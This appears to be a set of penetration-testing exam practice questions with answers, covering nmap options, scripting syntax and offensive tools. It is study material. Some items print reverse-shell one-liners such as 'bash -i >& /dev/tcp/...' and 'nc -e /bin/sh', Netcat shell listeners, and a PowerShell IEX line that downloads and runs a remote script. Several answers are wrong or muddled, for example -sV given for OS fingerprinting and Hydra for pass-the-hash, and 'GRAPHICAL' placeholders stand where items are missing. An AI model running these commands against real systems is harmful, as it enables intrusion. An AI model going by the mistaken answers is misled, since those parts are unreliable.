D4

A or B. Either the ncat or netcat remote access tool could be used to set up a bind shell exploit.

During a gray box penetration test, the tester wants to be able to set up a bind shell exploit where a listener is set up on a compromised system on the target. Which remote access tools could be used to do this? A. ncat B. netcat C. Powersploit D. DAST E. SAST

C. An if/then flow control structure in Bash uses the following syntax: - if condition then - commands... - else - commands... - fi

Consider the following snippet from a script: if test -f $FileName; then echo "The file exists." else echo "The file does not exist." fi What scripting language is this snippet written in? A. Ruby B. PowerShell C. Bash D. Python

B. The declare -i TOTAL command will create the TOTAL variable and type it as integer.

Which Bash script command will create a new variable named TOTAL and set its type to be integer? A. variable -i TOTAL B. declare -i TOTAL C. declare TOTAL -t integer D. TOTAL=integer

C. The test command can be used from within an if/then flow control structure to evaluate whether a specified condition is true.

Which command can be used from within an if/then flow control structure in a Bash script to evaluate whether a specified condition is true? A. eval B. == C. test D. <>

A. Adding the echo $TargetHost line to a PowerShell script causes it to display the value of a variable named TargetHost on the screen.

Which command in a PowerShell script will cause it to write the value of a variable named TargetHost on the screen? A. echo $TargetHost B. print (TargetHost) C. writeln TargetHost D. puts TargetHost

B. Adding the print (TargetHost) line to a Python script causes it to display the value of a variable named TargetHost on the screen.

Which command in a Python script will cause it to write the value of a variable named TargetHost on the screen? A. echo $TargetHost B. print (TargetHost) C. writeln TargetHost D. puts TargetHost

D. Adding the puts TargetHost line to a Ruby script causes it to display the value of a variable named TargetHost on the screen.

Which command in a Ruby script will cause it to write the value of a variable named TargetHost on the screen? A. echo $TargetHost B. print (TargetHost) C. writeln TargetHost D. puts TargetHost

D. All of the options shown in this question will cause nmap to detect services running on the target host. However, only the -sV option can be used with nmap to detect the version number of those services.

Which command option causes nmap to detect services running on a target host and report the version number of any services found? A. -sS B. -sT C. -sU D. -sV

C. The -p U:20,T:21,22 command tells nmap to just scan UDP port 20 and TCP ports 21 and 22. The other options in this question will also scan these ports; however, they also scan many other unwanted ports.

Which command option will cause nmap to scan just UDP port 20 and TCP ports 21 and 22? A. -p 20-22 B. --top-ports 1024 C. -p U:20,T:21,22 D. -p-

D. The if/then/else structure is considered to be a flow control structure because it branches the script in one of several directions based on how a specified condition evaluates.

Which control structure is considered to be a flow control structure? A. while loop B. for loop C. until loop D. if/then/else

C. The until looping structure will keep processing over and over as long as the specified condition evaluates to false.

Which control structure will keep processing over and over as long as the specified condition evaluates to false? A. while loop B. for loop C. until loop D. if/then/else

A. A while loop will keep processing over and over until the specified condition evaluates to false.

Which control structure will keep processing over and over until a specified condition evaluates to false? A. while loop B. for loop C. until loop D. if/then/else E. case

B. The for looping structure will process a specified number of times.

Which control structure will process a specified number of times? A. while loop B. for loop C. until loop D. if/then/else E. case

B. APK Studio is a tool that you can use to reverse engineer an APK executable and analyze it for vulnerabilities.

Which mobile tool can be used to reverse engineer an APK file from a mobile device running the Android operating system? A. Peach B. APK Studio C. Drozer D. DAST

A. Android APK Decompilation for the Lazy (APKX) is a Python wrapper that can extract Java source code directly from an Android APK executable.

Which mobile tool is a Python wrapper that can extract Java source code directly from an Android APK executable? A. APKX B. AFL C. Drozer D. DAST

C. The Drozer utility provides a complete security auditing and attack framework designed exclusively for mobile devices running the Android operating system.

Which mobile tool provides an attack framework that can be used to exploit mobile devices running the Android operating system? A. APKX B. APK Studio C. Drozer D. DAST

A. The --proxies option causes nmap to relay connections through a proxy server. You need to include the IP address of one or more proxy servers with this option.

Which nmap option causes the utility to relay connections through a proxy server? A. --proxies B. -S C. -D D. -g

A. nmap is the most commonly used command-line vulnerability scanner and is a free, open source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. nmap is a port scanner. To scan for ports, you will want to use -p <port ranges> (only scan specified ports). This option specifies which ports you want to scan and overrides the default scan. Individual port numbers or ranges are acceptable. Ranges are separated by a hyphen (e.g., 1-1023). The beginning and/or end values of a range may be omitted, causing nmap to use 1 and 65535, respectively. So, you can specify -p- to scan ports from 1 through 65535. Port scanning a system simply requires that nmap be installed and that you provide the target system's hostname or IP address.

Which nmap switch must a penetration tester use if they want to scan all the TCP ports on an identified device? A. -p- 1-65535 B. -p ALX C. -p 1-65544 D. -port 1-65534

A. The -T5 option causes nmap to scan in insane mode. This is the fastest type of nmap scan. However, the speed also makes it easier to detect by IDS/IPS tools or the target's IT staff.

Which nmap timing option causes it to scan in Insane mode? A. -T5 B. -T4 C. -T3 D. -T2 E. -T1

A. The -T0 option causes nmap to scan in paranoid mode, in which only one port is scanned on a target host every five minutes. While this mode can be used to run the stealthiest scans, it also causes them to run incredibly slowly.

Which nmap timing option causes it to scan in Paranoid mode? A. -T0 B. -T1 C. -T2 D. -T3 E. -T4

C. The -T2 option causes nmap to scan in polite mode. This type of scan runs quite slowly. However, the slowness also makes the scan harder to detect.

Which nmap timing option causes it to scan in Polite mode? A. -T0 B. -T1 C. -T2 D. -T3 E. -T4

D and E. Both Medusa and Hydra utilities can be used to conduct brute-force password attacks.

Which of the following are commonly used to perform brute-force password attacks? (Choose two.) A. BeFF B. Drozer C. W3AF D. Medusa E. Hydra

B and D. Both Patator and Aircrack-ng utilities can be used to conduct brute-force password attacks. Patator can be used to compromise a variety of network services, such as FTP, SNMP, and SSH servers. Aircrack-ng is used to brute-force wireless networks.

Which of the following can be used to perform brute-force password attacks? (Choose two.) A. Empire B. Patator C. Powersploit D. Aircrack-ng E. APK Studio

B. The #!/bin/bash element must be included at the beginning of every Bash shell script.

Which of the following elements must be included at the beginning of every Bash script? A. #Comment B. #!/bin/bash C. exit 0 D. #begin script

D. The Dirbuster utility is a brute-force utility that can be used by penetration testers to discover directories and files on a web server or an application server, including hidden files or directories.

Which of the following is a brute-force utility that can be used by penetration testers to discover directories and files on a web server? A. ncat B. Powersploit C. FOCA D. Dirbuster

C and D. Both Empire and PowerSploit utilities are based on Windows PowerShell. Essentially, they are a collection of PowerShell scripts that can be used to conduct a variety of exploits.

Which of the following penetration tools are based on Windows PowerShell? (Choose two.) A. BeEF B. SET C. Empire D. PowerSploit E. Hopper

C and E. Both foremost and FTK are forensic tools. They are used to gather and analyze digital evidence from a cyber crime scene.

Which of the following tools are used to collect and analyze evidence from a digital crime scene? (Choose two.) A. APKX B. Peach C. foremost D. AFL E. FTK

A and B. Both Findsecbugs and Yet Another Source Code Analyzer (YASCA) can be used to perform static application security testing (SAST) or dynamic application security testing (DAST) as part of software assurance.

Which of the following tools can be used as a part of software assurance processes to perform SAST and DAST testing? (Choose two.) A. Findsecbugs B. YASCA C. Metasploit D. theHarvester E. Recon-ng

A and D. Both AFL and Peach can be used to perform fuzzing on an application as part of software assurance.

Which of the following tools can be used as a part of software assurance processes to perform fuzz testing on an application? (Choose two.) A. AFL B. Olydbg C. Immunity debugger D. Peach E. GDB

A. Although Nikto is usually considered a vulnerability scanner used by penetration testers, it can also be used by system administrators to verify configuration compliance within their networks, specifically with the configuration of their web servers.

Which of the following tools can be used by a system administrator to ensure the network is in configuration compliance? A. Nikto B. Tableau C. AFL D. IDA Pro

A and D. Both APK Studio and APKX can be used to debug or even decompile an Android executable.

Which of the following tools can be used to debug or decompile an Android executable? (Choose two.) A. APK Studio B. Olydbg C. Immunity debugger D. APKX E. GDB

A and C. Both Nikto and W3AF utilities are commonly used to scan targets for vulnerabilities.

Which of the following utilities can be categorized as vulnerability scanners? (Choose two.) A. Nikto B. SET C. W3AF D. Medusa E. Hydra

C. The -oA option causes nmap to write the output from the scan to a normal text file, in an XML-formatted text file, and in a greppable text file all at once. You must specify a base filename with this option. A different extension will be added to each of the files generated using this base filename. The normal file will have an .nmap extension, the greppable file will have a .gnmap extension, and the XML file will have an .xml extension.

Which option causes nmap to save its output in a normal text file, in an XML-formatted text file, and in a greppable text file all at once? A. -oX B. -oN C. -oA D. -oG

B. The -oN option causes nmap to write the output from the scan to a standard text file. You must specify a filename with this option.

Which option causes nmap to save its output to a standard text file in the file system of the host where it was run? A. -oX B. -oN C. -oT D. -oV

D. The -oG option causes nmap to write the output from the scan to a text file in a format that allows it to be quickly searched using the grep command. You must specify a filename with this option.

Which option causes nmap to save its output to a text file that can be quickly searched using the grep command? A. -oV B. -oN C. -oT D. -oG

A. The -oX option causes nmap to write the output from the scan to an XML-formatted text file. You must specify a filename with this option.

Which option causes nmap to save its output to an XML-formatted text file in the file system of the host where it was run? A. -oX B. -oN C. -oT D. -oG

C. The -F option causes nmap to scan a specified number host for the 100 most commonly used IP ports. For example, this scan would include ports 20, 21, 23, 25, 53, 80, and so on. Sometimes, this is called a fast port scan.

Which option causes nmap to scan a host for the 100 most commonly used IP ports, such as 20, 21, 23, 25, 53, 80, etc.? A. -p- B. -sV C. -F D. -p 100

D. The -iR option causes nmap to scan a specified number of random hosts. For example, if you wanted to scan 50 random hosts, you would use the -iR 50 option with the nmap command.

Which option causes nmap to scan a specified number of random hosts? A. -iL B. -sS C. -sR D. -iR

A. The -f option causes nmap to scan using tiny, fragmented packets. Sometimes these small packets can be more difficult for packet filtering firewalls to properly analyze.

Which option causes nmap to scan using tiny, fragmented packets in an attempt to fool a packet filtering firewall? A. -f B. -Pn C. -n D. -sC

B. The -D option causes nmap to send scans from a spoofed IP address. You can specify one or more fake source IP addresses using this option.

Which option causes nmap to send scans from a spoofed IP address? A. -f B. -D C. -n D. -sF

C. The impacket penetration testing tool consists of a collection of Python classes used for low-level access to network protocols, such as SMB and MSRPC protocols.

Which penetration testing tool consists of a collection of Python classes used for low-level access to network protocols, such as SMB? A. Searchsploit B. Empire C. Impacket D. Responder

D. The searchsploit utility is a command-line search tool that is used to query the online Exploit-DB database for known exploits.

Which penetration testing tool is a command-line search tool for the online Exploit-DB database of known exploits? A. findbugs B. Shodan C. Censys D. Searchsploit

A. The Metasploit Framework (MSF) penetration testing tool provides a huge number of exploits that can be used to compromise the target organization's network.

Which penetration testing tool provides penetration testers with a huge number of exploits that can be used to compromise the target organization's network? A. Metasploit Framework B. SET C. hping D. ncat

A. The Browser Exploitation Framework (BeEF) is a penetration testing utility designed to exploit weaknesses in web browsers using client-side attacks.

Which penetration testing utility is focused on exploiting web browsers? A. BeEF B. foremost C. FTK D. EnCase E. Tableau

C. The -ge relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than or equal to the other.

Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than or equal to the other? A. >= B. -gt C. -ge D. !>=

B. The -gt relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than the other.

Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than the other? A. >= B. -gt C. -ge D. !>=

C. The -le relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than or equal to the other.

Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than or equal to the other? A. <= B. -lt C. -le D. !<

B. The -lt relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than the other.

Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than the other? A. <= B. -lt C. -le D. !<

A. The >= relational operator can be used in both Python and Ruby to test whether one value is numerically greater than or equal to the other.

Which relational operator can be used in both Python and Ruby to test whether one value is numerically greater than or equal to the other? A. >= B. -gt C. -ge D. !>=

A. The > relational operator can be used in both Python and Ruby to test whether one value is numerically greater than the other.

Which relational operator can be used in both Python and Ruby to test whether one value is numerically greater than the other? A. > B. < C. -gt D. !>

A. The <= relational operator can be used in both Python and Ruby to test whether one value is numerically less than or equal to the other.

Which relational operator can be used in both Python and Ruby to test whether one value is numerically less than or equal to the other? A. <= B. -lt C. -le D. !<

D. The < relational operator can be used in both Python and Ruby to test whether one value is numerically less than the other.

Which relational operator can be used in both Python and Ruby to test whether one value is numerically less than the other? A. <= B. -lt C. -le D. <

D. The ncat utility is an updated and improved version of the older netcat utility.

Which remote access tool was created by the organization that developed nmap as an updated version of the netcat utility that supports encrypted data tunnels? A. Metasploit Framework B. SET C. hping D. ncat

B. The Social Engineer Toolkit (SET) is an open source penetration testing utility designed to conduct social engineering exploits.

Which utility is used to conduct social engineering exploits? A. Responder B. SET C. APKX D. Immunity debugger E. Hopper

B. The CeWL utility can be configured to crawl the target organization's website and gather keywords from the site that could possibly be used as passwords by employees and then save them in a list. The list can then be used to run a brute-force password attack.

While performing a black box penetration test, the tester wants to crawl the target organization's website and gather key words that may possibly be used as passwords by employees and save them in a list. The tester will then run a brute-force password utility using that list in an attempt to gain access. Which utility should be used to create the possible password file? A. hashcat B. CeWL C. netcat D. Hydra

A and C. When declaring a variable, PowerShell uses a syntax of $variable_name = value. Ruby uses the same syntax when declaring a global variable.

While reading an executable script file, you see a line near the beginning of the script that declares a variable using the following syntax: $ServerName = FS1 Which type of script could this be? (Choose two.) A. PowerShell B. Bash C. Ruby D. Python

B and D. When declaring a variable, both Bash and Python use the same syntax: variable_name = value.

While reading an executable script file, you see a line near the beginning of the script that declares a variable using the following syntax: ServerName = FS1 Which type of script could this be? (Choose two.) A. PowerShell B. Bash C. Ruby D. Python

C. When declaring a local variable, Ruby uses a syntax of _variable_name = value.

While reading an executable script file, you see a line near the beginning of the script that declares a variable using the following syntax: _ServerName = FS1 Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python

A. When declaring an array, PowerShell uses the following syntax: $array_name = @(value1, value2, value3, ...).

While reading an executable script file, you see a line near the beginning of the script that declares an array using the following syntax: $PrimeNumArray = @(2, 3, 5, 7, 11) Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python

B. When declaring an array, Bash uses the following syntax: array_name = (value1, value2, value3, ...).

While reading an executable script file, you see a line near the beginning of the script that declares an array using the following syntax: PrimeNumArray = (2, 3, 5, 7, 11) Which type of script could this be? A. PowerShell B. Bash C. Ruby D. Python

GRAPHICAL

142

GRAPHICAL

150

GRAPHICAL

41

GRAPHICAL

42

GRAPHICAL

43

GRAPHICAL

44

GRAPHICAL

45

GRAPHICAL

46

GRAPHICAL

47

GRAPHICAL

48

GRAPHICAL

49

GRAPHICAL

50

GRAPHICAL

73

GRAPHICAL

76

GRAPHICAL

77

D and F. In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks.

A penetration tester has successfully exploited a DM2 server that seems to be listening to an outbound port. The tester wants to forward that traffic back to a device. What are the best tools to do this? (Choose two.) A. Cain and Abel B. Netcat C. Nmap D. Secure Shell (SSH) E. Tcpdump F. Wireshark

B and C. Given this scenario, the word let does not need to be included in the script, so it can be removed, and in Bash, the equivalent to an = is -eq, which is the arithmetic binary operator. Once these modifications are made, the script will work as expected.

A penetration tester is analyzing a script to determine why the script is not returning the correct results as expected. The expected results should be True. root:~# cat ./myscript.sh #!/bin/bash source=10 let dest=5+5 if [ 'source' = 'dest' ]; then echo "True" else echo "False" fi #End of File root:~# ./myscript.sh False By reviewing the script, how would the tester correct the errors to return the correct results? (Choose two.) A. Change fi' to 'Endlf B. Remove let in front of dest=5+5 C. Change the = to -eq D. Change -source* and 'dest' to "Ssource" and "Sdest" E. Change 'else' to 'elif

D. Passive reconnaissance is also known as open source intelligence (OSINT). The idea behind passive reconnaissance is to gather information about a target using only publicly available resources. Shodan is a specialized search engine that provides discovery of specific types of computers and devices that are connected to the Internet by using a variety of filters. Peach is a fuzzing tool, OpenVAS performs network vulnerability scans, and CeWL is a custom wordlist generator that searches websites for keywords that may be used in password-guessing attacks.

A penetration tester wants to perform passive reconnaissance on the client's external domain. What would be the best choice to use? A. CeWL B. OpenVAS C. Peach D. Shodan

A. A reverse shell opens a communication channel on a port and waits for incoming connections. The client's machine acts as a server and initiates a connection to the tester's machine. This is what is done by using the following: - bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1 Given the options, A is the best option. B and C will not work because they are using the <SOURCEIP> and not the <DESTINATIONIP>. Option D is not correct because it is using the improper syntax.

A penetration tester is conducting a test and gains access into an unrestricted system network by using port 443. The tester wants to create a reverse shell from the client back to the tester. Which of the following methods is most likely what the tester will use? A. bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1 B. nc -e /bin/sh <SOURCEIP> 443 C. perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443; D. ssh superadmin@<DESTINATIONIP> -p 443

A. Netcat can be used to set up a Telnet server in a matter of seconds. You can specify the shell you want Netcat to run at a successful connection with the -e parameter. In this scenario, the proper syntax would be nc -lp 444 -e /bin/bash. The nc - tells Windows to run the nc.exe file with the following arguments: -l: Listen mode, for inbound connections -p: Specifies a port to listen for a connection on -e: Tells what program to run once the port is connected to (cmd.exe) -v: Specifies to be verbose, printing out messages on Standard Error, such as when a connection occurs

A penetration tester is conducting a test and has compromised the client's host. What is the correct syntax to create a Netcat listener on this device? A. nc -lp 4444 -e /bin/bash B. nc -lvp 4444 /bin/bash C. nc -p 4444 /bin/bash D. nc -vp 4444 /bin/bash

B. SQLmap can be used to brute-force crack the password for an SQL database.

A penetration tester is performing a gray box test for a client. The tester decides to run a brute-force attack against a SQL database. Which utility could be used to do this? A. John the Ripper B. SQLmap C. WiFite D. Nikto

A. Mimikatz can be used to compromise Kerberos-based authentication systems, including generating "golden" and "silver" Kerberos tickets.

A penetration tester is performing a gray box test for a client. The tester wants to try to generate a Kerberos "golden ticket" to compromise services within the target Active Directory domain. Which utility could be used to do this? A. Mimikatz B. John the Ripper C. W3AF D. ncat

D. Metasploit is a tool for the development of exploits and the testing of them on live targets. The socks4a auxiliary is a module from within the framework. This auxiliary module provides a proxy server that uses Metasploit Framework routing to relay connections. So, using the use auxiliary/server/socks4a module allows a tester to access a private network from the Internet.

A penetration tester is using Metasploit. What command would allow the tester to access a private network from the Internet? A. db_nmp -iL /tmp/privatentwk.txt B. run autoroute -a 192.168.1.10/24 C. set rhost 192.168.1.10 D. use auxiliary/server/socks4a

A. In this scenario, the PowerShell command given will execute a remote script. By using the PowerShell IEX command, it will invoke an expression. The IEX cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. The PowerShell Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. By using a single Invoke-Command command, you can run commands on multiple computers.

A penetration tester is using PowerShell to conduct testing. The tester is using the following PowerShell command: powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1");Invoke-Command What action is being performed by this command? A. It executes a remote script. B. It incorporates an object. C. It runs an encoded command. D. It sets the execution policy.

D. The -T4 option tells nmap to scan in aggressive mode. This type of scan runs quite quickly. However, the speed also makes the scan easier to detect by IDS/IPS systems or the target's IT staff.

A penetration tester is using nmap to scan hosts on the target network. The client has a lax security posture and employs a relatively inexperienced IT staff. Which timing option could she consider using with nmap to speed up her scans? A. -T1 B. -T2 C. -T3 D. -T4

A. The -T1 option tells nmap to scan in sneaky mode. In this mode, a port will be scanned once every 15 seconds. As such, this type of scan is very slow. However, the slowness also makes the scan harder to detect.

A penetration tester is using nmap to scan hosts on the target network. The client uses an aggressive IPS tool and employs an experienced IT staff that she needs to avoid. Which timing option should she use with nmap to avoid detection? (Assume that time is not an issue.) A. -T1 B. -T3 C. -T4 D. -T5

C. If the nmap command is run without specifying a timing option, then the -T3 option is used by default. This tells nmap to scan in normal mode.

A penetration tester runs an nmap scan without specifying a timing option. Which one is used by default? A. -T1 B. -T2 C. -T3 D. -T4 E. -T0

A. The -sS option causes nmap to run a TCP SYN scan. In this scan, nmap sends a TCP SYN packet to a target host, and then the target host responds with a SYN ACK packet. However, instead of finishing the connection, nmap sends a reset packet to the target host.

A penetration tester uses the nmap utility to send a TCP SYN packet to a target host. The target host responds with a SYN ACK packet, but instead of finishing the connection, nmap sends a reset packet to the target host. Which option did the tester use with the nmap command? A. -sS B. -sT C. -sU D. -sL

C and E Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts. Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources.

A penetration tester wants to conduct open-source intelligence (OSINT) data collection from publicly available sources. Which of the following tools can be used? (Choose two.) A. BeEF B. Dynamo C. Maltego D. SET E. Shodan F. Wireshark

B. In a credentials brute-force attack, the tester will try to log in to the application using every username and password. Hydra is a brute-forcing tool that can crack systems using password guessing.

A penetration tester wants to perform a credential brute-force attack on a client's application. Which of the following tools should be used? A. Hashcat B. Hydra C. John the Ripper D. Peach

A. The -Pn option tells nmap to scan a host (or an entire subnet) without actually discovering hosts. This type of scan should be avoided during a penetration test because it takes a long time; each port on each IP address in the range is scanned, regardless of whether the IP address is valid. Because of this, it also creates a tremendous amount of traffic that may be detected by an IDS or IPS tool.

A penetration tester wants to run a port scan on all hosts on the 192.168.1.0 subnet (with a subnet mask of 255.255.255.0) without actually discovering the hosts first. Which command should she use? A. nmap 192.168.1.0/24 -Pn B. nmap 192.168.1.0/24 -sL C. nmap 192.168.1.0/24 -sn D. nmap 192.168.1.0/24 -n

D. Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services pretending to be the system that the query is intended for.

A penetration tester wants to target the NetBIOS name service. Which command is most likely to be used to exploit the NetBIOS name service? A. arpspoof B. burpsuite C. nmap D. responder

C. Metasploit is launched by running msfconsole from the command line. The msfconsole command is located in the /usr/share/metasploit-framework/msfconsole directory

A penetration tester wants to use Metasploit. Which of the following commands will start the Metasploit database? A. db_connect B. db_init C. msfconsole D. msfvenom

A and F. One of nmap's best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines the responses. -iL <inputfilename>: This is the input from list of hosts/networks. -sV: This probes open ports to determine service/version info.

A penetration tester, using nmap, has been asked to conduct OS fingerprinting using a company-provided text file that contains a list of all the IP addresses. What switches would you need to include in your code to conduct OS fingerprinting using the text file? (Choose two.) A. -iL B. -O C. -oN D. -oX E. -sS F. -sV

C. Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.

A tester has captured NTLM hashes and wants to conduct a pass-the-hash attack. Unfortunately, the tester doesn't know which systems on the network may accept the hash. What tool should the tester use to conduct the test? A. Drozer B. Hashcat C. Hydra D. Kismet

A. The tester will want to create a Netcat listener that waits for the inbound shell from the target machine. To get a shell, Netcat uses nc -nvlp 443 to listen for incoming connections Using this syntax, the tester is telling Netcat (nc) to not resolve names (-n), to be verbose printing out when a connection occurs (-v), and to listen (-l) on a given local port (-p).

A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0>&1 Which additional command would need to be executed on the tester's Linux system to make the previous command work? A. nc -nvlp 443 B. nc 10.2.4.6 443 C. nc -w3 10.2.4.6 443 D. nc-/bin/ah 10.2.4.6 443

A. The Browser Exploitation Framework (BeEF) is designed for this type of attack. BeEF provides an automated toolkit for using social engineering to take over a client's web browser. The tester can then use various phishing and social engineering techniques to get employees to visit the site.

A tester using penetration testing wants to deploy a malicious website at part of the test to exploit the browsers belonging to the client's employees. What tool can the test utilize? A. Browser Exploitation Framework (BeEF) B. Metasploit C. Open Web Application Security Project (OWASP) D. Social Engineer Toolkit (SET)

D and E. OWASP ZAP as well as Nessus can be used to scan a target for vulnerabilities.

As a part of a penetration test, you need to perform an in-depth scan of a target to identify vulnerabilities, such as missing updates or misconfigured security settings. Which utilities could you use to do this? (Choose 2) A. Censys B. theHarvester C. Shodan D. OWASP ZAP E. Nessus

D. The ncat utility can be used to read, write, redirect, and encrypt network data. For example, it can be used to establish shell sessions with a variety of servers, including Windows, Linux, and UNIX systems.

As a part of a penetration test, you want to access a shell session on a target Windows server. Which utility could be used to do this? A. Ollydbg B. GDB C. WinDBG D. ncat

A and D. The whois and nslookup utilities can be used to passively conduct reconnaissance on the target organization. Because they report information that is available to the general public, using these tools is highly unlikely to arouse any suspicion.

As a part of a penetration test, you need to perform reconnaissance on the target organization to passively gather information. Which tools could you use to do this? (Choose two.) A. whois B. Metasploit Framework C. OpenVAS D. nslookup E. Nessus

D and E. You could use either Kismet or WiFite to try to break the target organization's wireless network. You could also use Aircrack-ng to accomplish this.

As a part of a black box penetration test, you've discovered that the target organization's wireless network signal is emanating out into the parking lot and across the street. You want to access the internal network using this wireless network radio signal. However, the wireless network is encrypted. Which wireless compromise tools could you use to do this? (Choose two.) A. searchsploit B. netcat C. OWASP ZAP D. WiFite E. Kismet

A. Adding the echo $TargetHost line to a Bash script causes it to display the value of a variable named TargetHost on the screen.

As a part of a gray box penetration test, you need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to display the value of a variable named TargetHost on the screen. Which command will do this? A. echo $TargetHost B. write TargetHost C. writeln TargetHost D. output $TargetHost

A. When creating an associative array in a Bash script, you use the following syntax: array_name[element_name] = value. In this example, the line Target[HostName] = FS1 assigns a value of FS1 to the element named HostName within the Target array.

As a part of a gray box penetration test, you need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this? A. Target[HostName] = FS1 B. Target = [{"HostName":"FS1"}] C. $Target.HostName = 'FS1' D. _Target = {"HostName" => "FS1"}

C. When making a comparison between two integer values in a Bash script to see whether one is greater than the other, you use the -gt relational operator.

As a part of a gray box penetration test, you need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two integer variables to test whether one is numerically greater than the other. Which relational operator should you use? A. > B. < C. -gt D. !>

C. When creating an associative array in a PowerShell script, you use the following syntax: $array_name.element_name = "value". In this example, the line $Target.HostName = 'FS1' assigns a value of FS1 to the element named HostName within the Target array.

As a part of a gray box penetration test, you need to create a PowerShell script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this? A. Target[HostName] = FS1 B. Target = [{"HostName":"FS1"}] C. $Target.HostName = 'FS1' D. _Target = {"HostName" => "FS1"}

C. When making a comparison between two values in a PowerShell script to see if they are equal, you use the -eq relational operator.

As a part of a gray box penetration test, you need to create a PowerShell script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables to test whether they are equal. Which relational operator should you use? A. = B. == C. -eq D. !=

B. When creating an associative array in a PowerShell script, you use the following syntax: array_name = [{"element_name:value"}]. In this example, the line Target = [{"HostName":"FS1"}] assigns a value of FS1 to the element named HostName within the Target array.

As a part of a gray box penetration test, you need to create a Python script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this? A. Target[HostName] = FS1 B. Target = [{"HostName":"FS1"}] C. $Target.HostName = 'FS1' D. _Target = {"HostName" => "FS1"}

A and D. When making a comparison between two values in a Python script to see whether they are not equal, you can use either the <> or the != relational operator.

As a part of a gray box penetration test, you need to create a Python script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables that tests whether they are not equal. Which relational operators could you use? (Choose two.) A. <> B. == C. -eq D. != E. -ne

B. When making a comparison between two values in a Python script to see whether they are equal, you use the == relational operator.

As a part of a gray box penetration test, you need to create a Python script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables to test whether they are equal. Which relational operator should you use? A. = B. == C. -eq D. !=

D. When creating an associative array in a Ruby script, you use the following syntax: _array_name = {"element_name => value"}. In this example, the line _Target = {"HostName" => "FS1"} assigns a value of FS1 to the element named HostName within the Target array.

As a part of a gray box penetration test, you need to create a Ruby script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this? A. Target[HostName] = FS1 B. Target = [{"HostName":"FS1"}] C. $Target.HostName = 'FS1' D. _Target = {"HostName" => "FS1"}

B. When making a comparison between two values in a Ruby script to see whether they are equal, you use the == relational operator.

As a part of a gray box penetration test, you need to create a Ruby script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables to test whether they are equal. Which relational operator should you use? A. = B. == C. -eq D. !=

B and C. The nmap and hping utilities can be used to actively enumerate and fingerprint target systems.

As a part of a penetration test, you need to establish an active connection to the computer systems and devices at the target organization to enumerate and fingerprint them. Which tools could you use to do this? (Choose two.) A. whois B. nmap C. hping D. Aircrack-ng E. John the Ripper

A and B. John the Ripper as well as Cain and Abel can be used to crack passwords from an offline database of user accounts, such as the shadow and passwd files from a Linux system.

As a part of a penetration test, you need to gather user account names and passwords from the passwd and shadow files from a Linux server. Which utilities could you use to do this? (Choose two.) A. John the Ripper B. Cain and Abel C. Kismet D. Censys E. Recon-ng

A and B. Both IDA and Hopper can be used for decompilation. During this process, an executable file is reverse-compiled into source code, allowing you to examine it for vulnerabilities.

As a part of a penetration test, you want to reverse compile the executable for an in-house developed application used by the target organization. Which of the following tools can be used to do this? (Choose two.) A. IDA B. Hopper C. route D. Tableau E. FTK

C. The hashcat utility can be configured to use GPUs instead of CPUs to perform password cracking operations. This can dramatically speed up the process as GPUs can perform this task much faster than standard CPUs can.

As a penetration tester, you want to improve your password cracking speed by building a specialized system with multiple video boards installed. Which tool can take advantage of multiple GPUs for password cracking? A. proxychains B. John the Ripper C. hashcat D. theHarvester

A and C. Either the -p http,https option or the -p 80,443 option can be used with nmap to scan a host for a web server service.

As a penetration tester, you want to scan a Linux server with an IP address of 192.168.1.200 in the target network and see whether it has a web server installed and running. Which nmap commands will do this? (Choose two.) A. nmap 192.168.1.200 -p http,https B. nmap 192.168.1.200 -sn 80,443 C. nmap 192.168.1.200 -p 80,443 D. nmap 192.168.1.200 -T4 80,443

